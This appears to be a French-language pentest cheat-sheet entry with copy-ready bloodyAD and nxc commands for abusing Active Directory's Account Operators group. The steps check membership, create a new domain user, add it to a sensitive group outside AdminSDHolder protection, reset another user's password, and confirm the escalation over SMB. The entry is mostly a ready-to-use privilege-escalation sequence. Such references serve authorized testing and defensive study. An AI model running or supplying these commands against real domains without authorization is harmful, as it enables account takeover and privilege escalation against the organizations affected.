Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS get members 'Account Operators'Description: Vérifier si notre compte est dans Account Operators : droits de création/modification d'utilisateurs.
Exploitation
Account Operators
Abus du groupe Account Operators pour créer des comptes et modifier des utilisateurs existants.
Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add user '$NEWUSER' '$PASS'Description: Créer un utilisateur de domaine : Account Operators peut créer des comptes dans la plupart des OUs.
Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS add member '$SENSITIVE_GROUP' '$NEWUSER'Description: Ajouter l'utilisateur créé à un groupe sensible non protégé par AdminSDHolder.
Copy command
bloodyAD --host $DC -d $DOMAIN -u $USER -p $PASS set object '$TARGET_USER' --attribute userPassword --value '$NEWPASS'Description: Reset de mot de passe d'un compte existant (hors groupes protégés par SDProp).
Copy command
nxc smb $DC -u $NEWUSER -p $PASSDescription: Vérifier l'accès avec le compte créé ou modifié pour confirmer l'escalade.